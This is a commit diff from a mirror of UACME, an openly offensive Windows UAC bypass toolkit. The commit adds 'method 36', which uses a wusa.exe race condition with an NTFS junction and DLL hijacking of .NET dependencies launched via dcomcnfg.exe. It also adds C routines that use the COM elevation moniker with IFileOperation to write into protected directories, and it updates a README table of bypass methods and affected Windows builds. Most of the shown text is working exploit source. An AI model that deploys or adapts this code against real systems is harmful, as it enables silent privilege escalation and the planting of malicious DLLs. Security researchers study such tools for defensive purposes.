Rooba
/
UACME
mirror of https://github.com/hfiref0x/UACME.git
1
1
Fork 0
Code Issues Packages Projects Releases Wiki Activity

v 2.7.4 

Method 36 added, readme updated.
This commit is contained in:
hfiref0x 2017-06-22 14:17:35 +07:00
parent 34a5cc2ca0
commit ae5e80524a
47 changed files with 1372 additions and 581 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

BIN
Compiled/Akagi32.exe
View File

Binary file not shown.

BIN
Compiled/Akagi64.exe
View File

Binary file not shown.

20
README.md
View File

@ -244,9 +244,9 @@ Keys (watch debug output with dbgview or similar for more info):
* Method: Registry key manipulation
* Target(s): \system32\sdctl.exe
* Component(s): Attacker defined application
* Works from: Windows 10 (10240)
* Fixed in: unfixed :see_no_evil:
* How: -
* Works from: Windows 10 TH1 (10240)
* Fixed in: Windows 10 RS3 (16215)
* How: Shell API update
30. Author: Leo Davidson derivative, lhc645
* Type: Dll Hijack
* Method: WOW64 logger
@ -260,7 +260,7 @@ Keys (watch debug output with dbgview or similar for more info):
* Method: Registry key manipulation
* Target(s): \system32\sdctl.exe
* Component(s): Attacker defined application
* Works from: Windows 10 (10240)
* Works from: Windows 10 TH1 (10240)
* Fixed in: unfixed :see_no_evil:
* How: -
32. Author: xi-tauw
@ -276,7 +276,7 @@ Keys (watch debug output with dbgview or similar for more info):
* Method: Registry key manipulation
* Target(s): \system32\fodhelper.exe
* Component(s): Attacker defined application
* Works from: Windows 10 (10240)
* Works from: Windows 10 TH1 (10240)
* Fixed in: unfixed :see_no_evil:
* How: -
34. Author: James Forshaw
@ -297,11 +297,19 @@ Keys (watch debug output with dbgview or similar for more info):
* AlwaysNotify compatible, see note
* Fixed in: unfixed :see_no_evil:
* How: -
36. Author: Thomas Vanhoutte
* Type: Race condition
* Method: NTFS reparse point & Dll Hijack
* Target(s): wusa.exe
* Component(s): dcomcnfg.exe, mmc.exe, ole32.dll, MsCoree.dll
* Works from: Windows 7 (7600)
* Fixed in: unfixed :see_no_evil:
* How: -
Note:
* Method (6) unavailable in wow64 environment starting from Windows 8;
* Method (11) implemented in x86-32 version;
* Method (13) (19) and above implemented only in x64 version;
* Method (13) (19) implemented only in x64 version;
* Method (14) require process injection, wow64 unsupported, use x64 version of this tool;
* Method (26) is still working, however it main advantage was UAC bypass on AlwaysNotify level. Since 15031 it is gone;
* Method (30) require x64 because it abuses WOW64 subsystem feature;

BIN
Source/Akagi/Resource.rc
View File

Binary file not shown.

BIN
Source/Akagi/bin/Akatsuki64.cd
View File

Binary file not shown.

BIN
Source/Akagi/bin/Ikazuchi32.cd
View File

Binary file not shown.

BIN
Source/Akagi/bin/Ikazuchi64.cd
View File

Binary file not shown.

BIN
Source/Akagi/bin/fubuki32.cd
View File

Binary file not shown.

BIN
Source/Akagi/bin/fubuki64.cd
View File

Binary file not shown.

BIN
Source/Akagi/bin/hibiki32.cd
View File

Binary file not shown.

BIN
Source/Akagi/bin/hibiki64.cd
View File

Binary file not shown.

7
Source/Akagi/consts.h
View File

@ -4,9 +4,9 @@
*
* TITLE: CONSTS.H
*
* VERSION: 2.72
* VERSION: 2.74
*
* DATE: 26 May 2017
* DATE: 20 June 2017
*
* Global consts definition file.
*
@ -24,6 +24,7 @@
#define T_UACKEY L"MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\policies\\system"
#define T_APP_PATH L"Software\\Microsoft\\Windows\\CurrentVersion\\App Paths\\"
#define T_DOTNET_CLIENT L"Software\\Microsoft\\Windows NT\\CurrentVersion\\KnownFunctionTableDlls"
#define T_EXEFILE_SHELL L"Software\\Classes\\exefile\\shell\\runas\\command"
#define T_MSSETTINGS L"Software\\Classes\\ms-settings"
#define T_SHELL_OPEN_COMMAND L"\\shell\\open\\command"
@ -56,6 +57,7 @@
#define DISMCORE_DLL L"dismcore.dll"
#define DUSER_DLL L"duser.dll"
#define ELSEXT_DLL L"elsext.dll"
#define GDIPLUS_DLL L"GdiPlus.dll"
#define HIBIKI_DLL L"Hibiki.dll"
#define KERNEL32_DLL L"kernel32.dll"
#define LOGPROVIDER_DLL L"LogProvider.dll"
@ -80,6 +82,7 @@
#define CONSENT_EXE L"consent.exe"
#define CONTROL_EXE L"control.exe"
#define CREDWIZ_EXE L"credwiz.exe"
#define DCOMCNFG_EXE L"dcomcnfg.exe"
#define EVENTVWR_EXE L"eventvwr.exe"
#define EXPLORER_EXE L"explorer.exe"
#define FODHELPER_EXE L"fodhelper.exe"

9
Source/Akagi/global.h
View File

@ -4,9 +4,9 @@
*
* TITLE: GLOBAL.H
*
* VERSION: 2.72
* VERSION: 2.74
*
* DATE: 24 May 2017
* DATE: 10 June 2017
*
* Common header file for the program support routines.
*
@ -37,6 +37,7 @@
#pragma warning(disable: 4152) // nonstandard extension, function/data pointer conversion in expression
#pragma warning(disable: 4201) // nonstandard extension used : nameless struct/union
#pragma warning(disable: 6102) // Using %s from failed function call at line %u
#pragma warning(disable: 6258) // Using TerminateThread does not allow proper thread clean up
#pragma warning(disable: 6320) // exception-filter expression is the constant EXCEPTION_EXECUTE_HANDLER
#define PAYLOAD_ID_NONE MAXDWORD
@ -63,7 +64,7 @@
#include "shared\minirtl.h"
#include "shared\cmdline.h"
#include "shared\_filename.h"
#include "Shared\ldr.h"
#include "shared\ldr.h"
#include "consts.h"
#include "compress.h"
#include "sup.h"
@ -86,7 +87,7 @@ typedef struct _UACME_CONTEXT {
ULONG dwBuildNumber;
ULONG AkagiFlag;
ULONG IFileOperationFlags;
ULONG OptionalParameterLength;
ULONG OptionalParameterLength; //count of characters
WCHAR szSystemDirectory[MAX_PATH + 1];//with end slash
WCHAR szTempDirectory[MAX_PATH + 1]; //with end slash
WCHAR szOptionalParameter[MAX_PATH + 1]; //limited to MAX_PATH

6
Source/Akagi/main.c
View File

@ -4,9 +4,9 @@
*
* TITLE: MAIN.C
*
* VERSION: 2.72
* VERSION: 2.73
*
* DATE: 26 May 2017
* DATE: 08 June 2017
*
* Program entry point.
*
@ -136,8 +136,8 @@ UINT ucmInit(
bytesIO = 0;
GetCommandLineParam(GetCommandLine(), 2, szBuffer, MAX_PATH, &bytesIO);
if (bytesIO > 0) {
g_ctx.OptionalParameterLength = bytesIO;
_strcpy(g_ctx.szOptionalParameter, szBuffer);
g_ctx.OptionalParameterLength = 1 + bytesIO; //including 0
}
wincls.cbSize = sizeof(WNDCLASSEX);

100
Source/Akagi/methods/carberp.c
View File

@ -4,9 +4,9 @@
*
* TITLE: CARBERP.C
*
* VERSION: 2.70
* VERSION: 2.74
*
* DATE: 25 Mar 2017
* DATE: 10 June 2017
*
* Tweaked Carberp methods.
* Original Carberp is exploiting mcx2prov.exe in ehome.
@ -18,52 +18,6 @@
*
*******************************************************************************/
#include "global.h"
#include "makecab.h"
/*
* ucmWusaExtractPackage
*
* Purpose:
*
* Extract cab to protected directory using wusa.
* This routine expect source as ellocnak.msu cab file in the temp folder.
*
*/
BOOL ucmWusaExtractPackage(
_In_ LPWSTR lpTargetDirectory
)
{
BOOL bResult = FALSE;
SIZE_T Size;
LPWSTR lpCommandLine = NULL;
WCHAR szMsuFileName[MAX_PATH * 2];
if (lpTargetDirectory == NULL)
return FALSE;
RtlSecureZeroMemory(szMsuFileName, sizeof(szMsuFileName));
_strcpy(szMsuFileName, g_ctx.szTempDirectory);
_strcat(szMsuFileName, ELLOCNAK_MSU);
Size = ((1 + _strlen(lpTargetDirectory) +
_strlen(szMsuFileName) +
MAX_PATH) * sizeof(WCHAR));
lpCommandLine = (LPWSTR)supHeapAlloc(Size);
if (lpCommandLine) {
_strcpy(lpCommandLine, L"/c wusa ");
_strcat(lpCommandLine, szMsuFileName);
_strcat(lpCommandLine, L" /extract:");
_strcat(lpCommandLine, lpTargetDirectory);
bResult = supRunProcess(CMD_EXE, lpCommandLine);
supHeapFree(lpCommandLine);
}
DeleteFileW(szMsuFileName);
return bResult;
}
/*
* ucmWusaMethod
@ -142,55 +96,5 @@ BOOL ucmWusaMethod(
} while (cond);
return bResult;
}
/*
* ucmCreateCabinetForSingleFile
*
* Purpose:
*
* Build cabinet for usage in methods where required 1 file.
*
*/
BOOL ucmCreateCabinetForSingleFile(
_In_ LPWSTR lpSourceDll,
_In_ PVOID ProxyDll,
_In_ DWORD ProxyDllSize
)
{
BOOL cond = FALSE, bResult = FALSE;
CABDATA *Cabinet = NULL;
LPWSTR lpFileName;
WCHAR szMsuFileName[MAX_PATH * 2];
if ((ProxyDll == NULL) ||
(ProxyDllSize == 0) ||
(lpSourceDll == NULL)) return bResult;
do {
//drop proxy dll
if (!supWriteBufferToFile(lpSourceDll, ProxyDll, ProxyDllSize)) {
break;
}
//build cabinet
RtlSecureZeroMemory(szMsuFileName, sizeof(szMsuFileName));
_strcpy(szMsuFileName, g_ctx.szTempDirectory);
_strcat(szMsuFileName, ELLOCNAK_MSU);
Cabinet = cabCreate(szMsuFileName);
if (Cabinet == NULL)
break;
lpFileName = _filename(lpSourceDll);
//put file without compression
bResult = cabAddFile(Cabinet, lpSourceDll, lpFileName);
cabClose(Cabinet);
} while (cond);
return bResult;
}

12
Source/Akagi/methods/carberp.h
View File

@ -4,9 +4,9 @@
*
* TITLE: CARBERP.H
*
* VERSION: 2.70
* VERSION: 2.74
*
* DATE: 25 Mar 2017
* DATE: 10 June 2017
*
* Prototypes and definitions for Carberp method.
*
@ -22,11 +22,3 @@ BOOL ucmWusaMethod(
_In_ UCM_METHOD Method,
PVOID ProxyDll,
DWORD ProxyDllSize);
BOOL ucmWusaExtractPackage(
_In_ LPWSTR lpTargetDirectory);
BOOL ucmCreateCabinetForSingleFile(
_In_ LPWSTR lpSourceDll,
_In_ PVOID ProxyDll,
_In_ DWORD ProxyDllSize);

333
Source/Akagi/methods/comfileop.c Normal file
View File

@ -0,0 +1,333 @@
/*******************************************************************************
*
* (C) COPYRIGHT AUTHORS, 2017
*
* TITLE: COMFILEOP.C
*
* VERSION: 2.74
*
* DATE: 10 June 2017
*
* IFileOperation based routines.
*
* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
* PARTICULAR PURPOSE.
*
*******************************************************************************/
#include "global.h"
/*
* ucmMasqueradedCoGetObjectElevate
*
* Purpose:
*
* CoGetObject elevation as admin.
*
*/
HRESULT ucmMasqueradedCoGetObjectElevate(
_In_ LPWSTR clsid,
_In_ DWORD dwClassContext,
_In_ REFIID riid,
_Outptr_ void **ppv
)
{
HRESULT r = E_FAIL;
BIND_OPTS3 bop;
WCHAR szElevationMoniker[MAX_PATH];
if (clsid == NULL)
return r;
if (_strlen(clsid) > 64)
return r;
RtlSecureZeroMemory(szElevationMoniker, sizeof(szElevationMoniker));
_strcpy(szElevationMoniker, L"Elevation:Administrator!new:");
_strcat(szElevationMoniker, clsid);
RtlSecureZeroMemory(&bop, sizeof(bop));
bop.cbStruct = sizeof(bop);
bop.dwClassContext = dwClassContext;
return CoGetObject(szElevationMoniker, (BIND_OPTS *)&bop, riid, ppv);
}
/*
* ucmMasqueradedRenameElementCOM
*
* Purpose:
*
* Rename file/directory autoelevated.
* This function expects that supMasqueradeProcess was called on process initialization.
*
*/
BOOL ucmMasqueradedRenameElementCOM(
_In_ LPWSTR OldName,
_In_ LPWSTR NewName
)
{
BOOL bCond = FALSE, bResult = FALSE;
IFileOperation *FileOperation1 = NULL;
IShellItem *psiDestDir = NULL;
HRESULT r = E_FAIL;
do {
if ((OldName == NULL) || (NewName == NULL))
break;
r = CoCreateInstance(&CLSID_FileOperation, NULL,
CLSCTX_INPROC_SERVER | CLSCTX_LOCAL_SERVER | CLSCTX_INPROC_HANDLER, &IID_IFileOperation, &FileOperation1);
if (r != S_OK) {
break;
}
if (FileOperation1 != NULL) {
FileOperation1->lpVtbl->Release(FileOperation1);
}
r = ucmMasqueradedCoGetObjectElevate(
T_CLSID_FileOperation,
CLSCTX_INPROC_SERVER | CLSCTX_LOCAL_SERVER | CLSCTX_INPROC_HANDLER,
&IID_IFileOperation,
&FileOperation1);
if (r != S_OK) {
break;
}
if (FileOperation1 == NULL) {
r = E_FAIL;
break;
}
FileOperation1->lpVtbl->SetOperationFlags(FileOperation1, g_ctx.IFileOperationFlags);
r = SHCreateItemFromParsingName(OldName, NULL, &IID_IShellItem, &psiDestDir);
if (r != S_OK) {
break;
}
r = FileOperation1->lpVtbl->RenameItem(FileOperation1, psiDestDir, NewName, NULL);
if (r != S_OK) {
break;
}
r = FileOperation1->lpVtbl->PerformOperations(FileOperation1);
if (r != S_OK) {
break;
}
psiDestDir->lpVtbl->Release(psiDestDir);
psiDestDir = NULL;
bResult = TRUE;
} while (bCond);
if (FileOperation1 != NULL) {
FileOperation1->lpVtbl->Release(FileOperation1);
}
if (psiDestDir != NULL) {
psiDestDir->lpVtbl->Release(psiDestDir);
}
return bResult;
}
/*
* ucmMasqueradedCreateSubDirectoryCOM
*
* Purpose:
*
* Create directory autoelevated.
* This function expects that supMasqueradeProcess was called on process initialization.
*
*/
BOOL ucmMasqueradedCreateSubDirectoryCOM(
_In_ LPWSTR ParentDirectory,
_In_ LPWSTR SubDirectory
)
{
BOOL bCond = FALSE, bResult = FALSE;
IFileOperation *FileOperation1 = NULL;
IShellItem *psiDestDir = NULL;
HRESULT r = E_FAIL;
do {
if ((SubDirectory == NULL) || (ParentDirectory == NULL))
break;
r = CoCreateInstance(&CLSID_FileOperation, NULL,
CLSCTX_INPROC_SERVER | CLSCTX_LOCAL_SERVER | CLSCTX_INPROC_HANDLER, &IID_IFileOperation, &FileOperation1);
if (r != S_OK) {
break;
}
if (FileOperation1 != NULL) {
FileOperation1->lpVtbl->Release(FileOperation1);
}
r = ucmMasqueradedCoGetObjectElevate(
T_CLSID_FileOperation,
CLSCTX_INPROC_SERVER | CLSCTX_LOCAL_SERVER | CLSCTX_INPROC_HANDLER,
&IID_IFileOperation,
&FileOperation1);
if (r != S_OK) {
break;
}
if (FileOperation1 == NULL) {
r = E_FAIL;
break;
}
FileOperation1->lpVtbl->SetOperationFlags(FileOperation1, g_ctx.IFileOperationFlags);
r = SHCreateItemFromParsingName(ParentDirectory, NULL, &IID_IShellItem, &psiDestDir);
if (r != S_OK) {
break;
}
r = FileOperation1->lpVtbl->NewItem(FileOperation1, psiDestDir, FILE_ATTRIBUTE_DIRECTORY, SubDirectory, NULL, NULL);
if (r != S_OK) {
break;
}
r = FileOperation1->lpVtbl->PerformOperations(FileOperation1);
if (r != S_OK) {
break;
}
psiDestDir->lpVtbl->Release(psiDestDir);
psiDestDir = NULL;
bResult = TRUE;
} while (bCond);
if (FileOperation1 != NULL) {
FileOperation1->lpVtbl->Release(FileOperation1);
}
if (psiDestDir != NULL) {
psiDestDir->lpVtbl->Release(psiDestDir);
}
return bResult;
}
/*
* ucmMasqueradedMoveCopyFileCOM
*
* Purpose:
*
* Move or Copy file autoelevated.
* This function expects that supMasqueradeProcess was called on process initialization.
*
*/
BOOL ucmMasqueradedMoveCopyFileCOM(
_In_ LPWSTR SourceFileName,
_In_ LPWSTR DestinationDir,
_In_ BOOL fMove
)
{
BOOL cond = FALSE;
IFileOperation *FileOperation1 = NULL;
IShellItem *isrc = NULL, *idst = NULL;
SHELLEXECUTEINFOW shexec;
HRESULT r = E_FAIL;
do {
if ((SourceFileName == NULL) || (DestinationDir == NULL))
break;
RtlSecureZeroMemory(&shexec, sizeof(shexec));
r = CoCreateInstance(&CLSID_FileOperation, NULL,
CLSCTX_INPROC_SERVER | CLSCTX_LOCAL_SERVER | CLSCTX_INPROC_HANDLER, &IID_IFileOperation, &FileOperation1);
if (r != S_OK)
break;
if (FileOperation1 != NULL)
FileOperation1->lpVtbl->Release(FileOperation1);
r = ucmMasqueradedCoGetObjectElevate(
T_CLSID_FileOperation,
CLSCTX_INPROC_SERVER | CLSCTX_LOCAL_SERVER | CLSCTX_INPROC_HANDLER,
&IID_IFileOperation,
&FileOperation1);
if (r != S_OK)
break;
if (FileOperation1 == NULL) {
r = E_FAIL;
break;
}
FileOperation1->lpVtbl->SetOperationFlags(FileOperation1, g_ctx.IFileOperationFlags);
r = SHCreateItemFromParsingName(SourceFileName, NULL, &IID_IShellItem, &isrc);
if (r != S_OK)
break;
r = SHCreateItemFromParsingName(DestinationDir, NULL, &IID_IShellItem, &idst);
if (r != S_OK)
break;
if (fMove)
r = FileOperation1->lpVtbl->MoveItem(FileOperation1, isrc, idst, NULL, NULL);
else
r = FileOperation1->lpVtbl->CopyItem(FileOperation1, isrc, idst, NULL, NULL);
if (r != S_OK)
break;
r = FileOperation1->lpVtbl->PerformOperations(FileOperation1);
if (r != S_OK)
break;
idst->lpVtbl->Release(idst);
idst = NULL;
isrc->lpVtbl->Release(isrc);
isrc = NULL;
} while (cond);
if (FileOperation1 != NULL)
FileOperation1->lpVtbl->Release(FileOperation1);
if (isrc != NULL)
isrc->lpVtbl->Release(isrc);
if (idst != NULL)
idst->lpVtbl->Release(idst);
return (SUCCEEDED(r));
}
/*
* ucmMasqueradedMoveFileCOM
*
* Purpose:
*
* Move file autoelevated.
* This function expects that supMasqueradeProcess was called on process initialization.
*
*/
BOOL ucmMasqueradedMoveFileCOM(
_In_ LPWSTR SourceFileName,
_In_ LPWSTR DestinationDir
)
{
return ucmMasqueradedMoveCopyFileCOM(SourceFileName, DestinationDir, TRUE);
}

42
Source/Akagi/methods/comfileop.h Normal file
View File

@ -0,0 +1,42 @@
/*******************************************************************************
*
* (C) COPYRIGHT AUTHORS, 2017
*
* TITLE: COMFILEOP.H
*
* VERSION: 2.74
*
* DATE: 10 June 2017
*
* Prototypes and definitions for IFileOperation based routines.
*
* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
* PARTICULAR PURPOSE.
*
*******************************************************************************/
#pragma once
HRESULT ucmMasqueradedCoGetObjectElevate(
_In_ LPWSTR clsid,
_In_ DWORD dwClassContext,
_In_ REFIID riid,
_Outptr_ void **ppv);
BOOL ucmMasqueradedCreateSubDirectoryCOM(
_In_ LPWSTR ParentDirectory,
_In_ LPWSTR SubDirectory);
BOOL ucmMasqueradedMoveCopyFileCOM(
_In_ LPWSTR SourceFileName,
_In_ LPWSTR DestinationDir,
_In_ BOOL fMove);
BOOL ucmMasqueradedMoveFileCOM(
_In_ LPWSTR SourceFileName,
_In_ LPWSTR DestinationDir);
BOOL ucmMasqueradedRenameElementCOM(
_In_ LPWSTR OldName,
_In_ LPWSTR NewName);

14
Source/Akagi/methods/enigma0x3.c
View File

@ -4,9 +4,9 @@
*
* TITLE: ENIGMA0X3.C
*
* VERSION: 2.73
* VERSION: 2.74
*
* DATE: 27 May 2017
* DATE: 20 June 2017
*
* Enigma0x3 autoelevation methods and everything based on the same
* ShellExecute related registry manipulations idea.
@ -62,7 +62,7 @@ BOOL ucmHijackShellCommandMethod(
sz = 0x1000;
}
else {
sz = _strlen(lpszPayload) * sizeof(WCHAR);
sz = (1 + _strlen(lpszPayload)) * sizeof(WCHAR);
}
lpBuffer = supHeapAlloc(sz);
if (lpBuffer == NULL)
@ -162,7 +162,8 @@ DWORD ucmDiskCleanupWorkerThread(
InitializeObjectAttributes(&ObjectAttributes, &usName, OBJ_CASE_INSENSITIVE, 0, NULL);
status = NtCreateFile(&hDirectory, FILE_LIST_DIRECTORY | SYNCHRONIZE,
status = NtCreateFile(&hDirectory,
FILE_LIST_DIRECTORY | SYNCHRONIZE,
&ObjectAttributes,
&IoStatusBlock,
NULL,
@ -171,8 +172,7 @@ DWORD ucmDiskCleanupWorkerThread(
FILE_OPEN,
FILE_DIRECTORY_FILE | FILE_SYNCHRONOUS_IO_NONALERT,
NULL,
0
);
0);
if (!NT_SUCCESS(status))
break;
@ -362,7 +362,7 @@ BOOL ucmAppPathMethod(
sz = 0x1000;
}
else {
sz = _strlen(lpszPayload) * sizeof(WCHAR);
sz = (1 + _strlen(lpszPayload)) * sizeof(WCHAR);
}
lpBuffer = supHeapAlloc(sz);
if (lpBuffer == NULL)

137
Source/Akagi/methods/hybrids.c
View File

@ -4,9 +4,9 @@
*
* TITLE: HYBRIDS.C
*
* VERSION: 2.71
* VERSION: 2.74
*
* DATE: 06 May 2017
* DATE: 20 June 2017
*
* Hybrid UAC bypass methods.
*
@ -1738,3 +1738,136 @@ BOOL ucmUiAccessMethod(
return bResult;
}
/*
* ucmJunctionMethod
*
* Purpose:
*
* Bypass UAC using two different steps:
*
* 1) Create wusa.exe race condition and force wusa to copy files to the protected directory using NTFS reparse point.
* 2) Dll hijack dotnet dependencies.
*
* Wusa race condition in combination with junctions found by Thomas Vanhoutte.
* Twitter: https://twitter.com/SandboxEscaper
* Blog: https://thomas-vanhoutte.blogspot.be
*
*/
BOOL ucmJunctionMethod(
PVOID ProxyDll,
DWORD ProxyDllSize
)
{
BOOL bResult = FALSE, bDropComplete = FALSE, bCond = FALSE;
HKEY hKey = NULL;
LRESULT lResult;
LPWSTR lpTargetDirectory = NULL, lpEnd = NULL;
DWORD i, cValues = 0, cbMaxValueNameLen = 0, bytesIO;
WCHAR szBuffer[MAX_PATH * 2];
WCHAR szSource[MAX_PATH * 2];
do {
//
// Drop payload dll to %temp% and make cab for it.
//
RtlSecureZeroMemory(szSource, sizeof(szSource));
_strcpy(szSource, g_ctx.szTempDirectory);
if (g_ctx.dwBuildNumber < 9600) {
_strcat(szSource, OLE32_DLL);
}
else {
_strcat(szSource, MSCOREE_DLL);
}
if (!ucmCreateCabinetForSingleFile(szSource, ProxyDll, ProxyDllSize))
break;
//
// Locate target directory.
//
lResult = RegOpenKeyEx(HKEY_LOCAL_MACHINE, T_DOTNET_CLIENT, 0, MAXIMUM_ALLOWED, &hKey);
if (lResult != ERROR_SUCCESS)
break;
lResult = RegQueryInfoKey(hKey,
NULL,
NULL,
NULL,
NULL,
NULL,
NULL,
&cValues,
&cbMaxValueNameLen,
NULL,
NULL,
NULL);
if (lResult != ERROR_SUCCESS)
break;
if ((cValues == 0) || (cbMaxValueNameLen == 0))
break;
if (cbMaxValueNameLen > MAX_PATH)
break;
bDropComplete = FALSE;
//
// Drop file in each.
//
for (i = 0; i < cValues; i++) {
RtlSecureZeroMemory(&szBuffer, sizeof(szBuffer));
bytesIO = MAX_PATH;
lResult = RegEnumValue(hKey,
i,
(LPWSTR)&szBuffer,
&bytesIO,
NULL,
NULL,
NULL,
NULL);
lpTargetDirectory = _filepath(szBuffer, szBuffer);
if (lpTargetDirectory == NULL) {
bDropComplete = FALSE;
break;
}
lpEnd = _strend(lpTargetDirectory);
if (*(lpEnd - 1) == TEXT('\\'))
*(lpEnd - 1) = TEXT('\0');
if (!ucmWusaExtractViaJunction(lpTargetDirectory)) {
bDropComplete = FALSE;
break;
}
bDropComplete = TRUE;
}
if (!bDropComplete)
break;
//
// Exploit dll hijacking.
//
RtlSecureZeroMemory(szBuffer, sizeof(szBuffer));
_strcpy(szBuffer, g_ctx.szSystemDirectory);
_strcat(szBuffer, DCOMCNFG_EXE);
bResult = supRunProcess(szBuffer, NULL);
} while (bCond);
if (hKey != NULL)
RegCloseKey(hKey);
return bResult;
}

8
Source/Akagi/methods/hybrids.h
View File

@ -4,9 +4,9 @@
*
* TITLE: HYBRIDS.H
*
* VERSION: 2.71
* VERSION: 2.74
*
* DATE: 06 May 2017
* DATE: 20 June 2017
*
* Prototypes and definitions for hybrid methods.
*
@ -96,3 +96,7 @@ BOOL ucmWow64LoggerMethod(
BOOL ucmUiAccessMethod(
PVOID ProxyDll,
DWORD ProxyDllSize);
BOOL ucmJunctionMethod(
PVOID ProxyDll,
DWORD ProxyDllSize);

18
Source/Akagi/methods/methods.c
View File

@ -4,9 +4,9 @@
*
* TITLE: METHODS.C
*
* VERSION: 2.73
* VERSION: 2.74
*
* DATE: 27 May 2017
* DATE: 20 June 2017
*
* UAC bypass dispatch.
*
@ -47,6 +47,7 @@ UCM_API(MethodUiAccess);
UCM_API(MethodMsSettings);
UCM_API(MethodTyranid);
UCM_API(MethodTokenMod);
UCM_API(MethodJunction);
UCM_API_DISPATCH_ENTRY ucmMethodsDispatchTable[UCM_DISPATCH_ENTRY_MAX] = {
{ MethodTest, NULL, { 7600, MAXDWORD }, FUBUKI_ID, FALSE, TRUE, TRUE },
@ -78,13 +79,14 @@ UCM_API_DISPATCH_ENTRY ucmMethodsDispatchTable[UCM_DISPATCH_ENTRY_MAX] = {
{ MethodEnigma0x3_2, NULL, { 7600, 15031 }, FUBUKI_ID, FALSE, TRUE, TRUE },
{ MethodExpLife, NULL, { 7600, 16199 }, PAYLOAD_ID_NONE, FALSE, TRUE, FALSE },
{ MethodSandworm, NULL, { 7600, 9600 }, FUBUKI_ID, FALSE, TRUE, TRUE },
{ MethodEnigma0x3_3, NULL, { 10240, MAXDWORD }, PAYLOAD_ID_NONE, FALSE, TRUE, FALSE },
{ MethodEnigma0x3_3, NULL, { 10240, 16215 }, PAYLOAD_ID_NONE, FALSE, TRUE, FALSE },
{ MethodWow64Logger, NULL, { 7600, MAXDWORD }, AKATSUKI_ID, FALSE, TRUE, TRUE },
{ MethodEnigma0x3_4, NULL, {10240, MAXDWORD }, PAYLOAD_ID_NONE, FALSE, FALSE, FALSE },
{ MethodUiAccess, NULL, { 7600, MAXDWORD }, FUBUKI_ID, FALSE, TRUE, TRUE },
{ MethodMsSettings, NULL, { 10240, MAXDWORD }, PAYLOAD_ID_NONE, FALSE, FALSE, FALSE },
{ MethodTyranid, NULL, { 9600, MAXDWORD }, PAYLOAD_ID_NONE, FALSE, FALSE, FALSE },
{ MethodTokenMod, NULL, { 7600, MAXDWORD }, PAYLOAD_ID_NONE, FALSE, FALSE, FALSE }
{ MethodTokenMod, NULL, { 7600, MAXDWORD }, PAYLOAD_ID_NONE, FALSE, FALSE, FALSE },
{ MethodJunction, NULL, { 7600, MAXDWORD }, FUBUKI_ID, FALSE, TRUE, TRUE }
};
/*
@ -686,3 +688,11 @@ UCM_API(MethodTokenMod)
return ucmTokenModification(lpszPayload);
}
UCM_API(MethodJunction)
{
UNREFERENCED_PARAMETER(Method);
UNREFERENCED_PARAMETER(ExtraContext);
return ucmJunctionMethod(PayloadCode, PayloadSize);
}

7
Source/Akagi/methods/methods.h
View File

@ -4,9 +4,9 @@
*
* TITLE: METHODS.H
*
* VERSION: 2.73
* VERSION: 2.74
*
* DATE: 27 May 2017
* DATE: 20 June 2017
*
* Prototypes and definitions for UAC bypass methods table.
*
@ -55,6 +55,7 @@ typedef enum _UCM_METHOD {
UacMethodMsSettings, //+
UacMethodTyranid, //+
UacMethodTokenMod, //+
UacMethodJunction, //+
UacMethodMax
} UCM_METHOD;
@ -88,6 +89,8 @@ typedef struct _UCM_API_DISPATCH_ENTRY {
BOOL SetParameterInRegistry;
} UCM_API_DISPATCH_ENTRY, *PUCM_API_DISPATCH_ENTRY;
#include "comfileop.h"
#include "wusa.h"
#include "pitou.h"
#include "simda.h"
#include "explife.h"

318
Source/Akagi/methods/pitou.c
View File

@ -4,9 +4,9 @@
*
* TITLE: PITOU.C
*
* VERSION: 2.71
* VERSION: 2.74
*
* DATE: 07 May 2017
* DATE: 10 June 2017
*
* Leo Davidson based IFileOperation auto-elevation.
*
@ -18,283 +18,6 @@
*******************************************************************************/
#include "global.h"
/*
* ucmMasqueradedRenameElementCOM
*
* Purpose:
*
* Rename file/directory autoelevated.
* This function expects that supMasqueradeProcess was called on process initialization.
*
*/
BOOL ucmMasqueradedRenameElementCOM(
_In_ LPWSTR OldName,
_In_ LPWSTR NewName
)
{
BOOL bCond = FALSE, bResult = FALSE;
IFileOperation *FileOperation1 = NULL;
IShellItem *psiDestDir = NULL;
HRESULT r = E_FAIL;
do {
if ((OldName == NULL) || (NewName == NULL))
break;
r = CoCreateInstance(&CLSID_FileOperation, NULL,
CLSCTX_INPROC_SERVER | CLSCTX_LOCAL_SERVER | CLSCTX_INPROC_HANDLER, &IID_IFileOperation, &FileOperation1);
if (r != S_OK) {
break;
}
if (FileOperation1 != NULL) {
FileOperation1->lpVtbl->Release(FileOperation1);
}
r = ucmMasqueradedCoGetObjectElevate(
T_CLSID_FileOperation,
CLSCTX_INPROC_SERVER | CLSCTX_LOCAL_SERVER | CLSCTX_INPROC_HANDLER,
&IID_IFileOperation,
&FileOperation1);
if (r != S_OK) {
break;
}
if (FileOperation1 == NULL) {
r = E_FAIL;
break;
}
FileOperation1->lpVtbl->SetOperationFlags(FileOperation1, g_ctx.IFileOperationFlags);
r = SHCreateItemFromParsingName(OldName, NULL, &IID_IShellItem, &psiDestDir);
if (r != S_OK) {
break;
}
r = FileOperation1->lpVtbl->RenameItem(FileOperation1, psiDestDir, NewName, NULL);
if (r != S_OK) {
break;
}
r = FileOperation1->lpVtbl->PerformOperations(FileOperation1);
if (r != S_OK) {
break;
}
psiDestDir->lpVtbl->Release(psiDestDir);
psiDestDir = NULL;
bResult = TRUE;
} while (bCond);
if (FileOperation1 != NULL) {
FileOperation1->lpVtbl->Release(FileOperation1);
}
if (psiDestDir != NULL) {
psiDestDir->lpVtbl->Release(psiDestDir);
}
return bResult;
}
/*
* ucmMasqueradedCreateSubDirectoryCOM
*
* Purpose:
*
* Create directory autoelevated.
* This function expects that supMasqueradeProcess was called on process initialization.
*
*/
BOOL ucmMasqueradedCreateSubDirectoryCOM(
_In_ LPWSTR ParentDirectory,
_In_ LPWSTR SubDirectory
)
{
BOOL bCond = FALSE, bResult = FALSE;
IFileOperation *FileOperation1 = NULL;
